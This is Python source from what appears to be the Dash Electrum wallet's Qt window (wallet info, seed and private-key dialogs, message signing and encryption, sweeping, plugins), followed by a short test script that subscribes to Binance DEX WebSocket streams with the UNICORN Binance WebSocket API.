wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
@ps_ks_protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
@ps_ks_protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Dash Electrum, but in general.')
@protected
@ps_ks_protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
if self.wallet.psman.is_ps_ks(address):
txin_type = self.wallet.psman.ps_ks_txin_type
else:
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
@ps_ks_protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
if self.wallet.psman.is_ps_ks(address):
pubkey = self.wallet.psman.get_public_key(address)
else:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum_dash.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Dash Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a dash URI
data_l = data.lower()
if (data_l.startswith(DASH_BIP21_URI_SCHEME + ':')
or data_l.startswith(PAY_BIP21_URI_SCHEME + ':')):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Dash Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected_with_parent
def export_privkeys_dialog(self, parent, password, ps_ks_only=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(parent, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
w = self.wallet
if ps_ks_only:
addresses = w.psman.get_addresses()
else:
addresses = w.get_addresses() + w.psman.get_addresses()
done = False
cancelled = False
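        # Derive keys on a background thread; progress is reported to the GUI
        # via computing_privkeys_signal, and show_privkeys_signal fires once
        # every address has been exported.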
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Dash Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, FILE_OWNER_MODE)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def export_invoices_with_ext(self):
export_meta_gui(self, _('invoices_with_ext'),
self.wallet.export_invoices_with_ext)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self, go_tab=None):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config, go_tab)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Dash Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
psman = self.wallet.psman
if psman.state in psman.mixing_running_states and not psman.is_waiting:
if not self.question(psman.WAIT_MIXING_STOP_MSG):
event.ignore()
return
if (psman.is_hw_ks
and psman.ps_keystore
and psman.show_warn_ps_ks
and psman.check_funds_on_ps_keystore()):
warn = _('There are funds left on PrivateSend keystore')
q = _('Send all coins to hardware wallet')
msg = f'{warn}\n\n{q}?'
cb = QCheckBox(_("Don't show this again."))
cb.setChecked(psman.show_warn_ps_ks)
def on_cb(x):
psman.show_warn_ps_ks = (x == Qt.Checked)
cb.stateChanged.connect(on_cb)
if self.question(msg, checkbox=cb):
self.send_funds_to_main_ks(mwin=self, parent=self)
event.ignore()
return
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def stop_get_data_threads(self):
self.history_list.hm.get_data_thread.stop()
self.address_list.am.get_data_thread.stop()
self.utxo_list.cm.get_data_thread.stop()
self.history_list.hm.get_data_thread.wait()
self.address_list.am.get_data_thread.wait()
self.utxo_list.cm.get_data_thread.wait()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
self.stop_get_data_threads()
hide_ps_dialog(self)
self.dip3_tab.cleanup()
util.unregister_callback(self.on_ps_callback)
if self.network:
self.wallet.protx_manager.clean_up()
util.unregister_callback(self.on_dash_net)
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Dash Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.is_available() and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Dash Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
dev_test_dex_subscribe.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_dex_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
#pass
print(oldest_stream_data_from_stream_buffer)
# create instance of BinanceWebSocketApiManager for Binance Chain DEX
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.org")
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BNB_USDSB-1AC', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
stream_id = binance_websocket_api_manager.create_stream(["kline_1m"], markets)
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
channels = ['kline_5m', 'kline_15m']
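# add further channels to the running DEX stream, then remove a subset again
# for the listed markets and ask the manager for the resulting subscriptions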
binance_websocket_api_manager.subscribe_to_stream(stream_id,
channels=['kline_1m', 'kline_5m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'])
binance_websocket_api_manager.unsubscribe_from_stream(stream_id,
channels=['kline_1m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'],
markets=markets)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while True:
#binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.print_stream_info(stream_id)
time.sleep(1)
|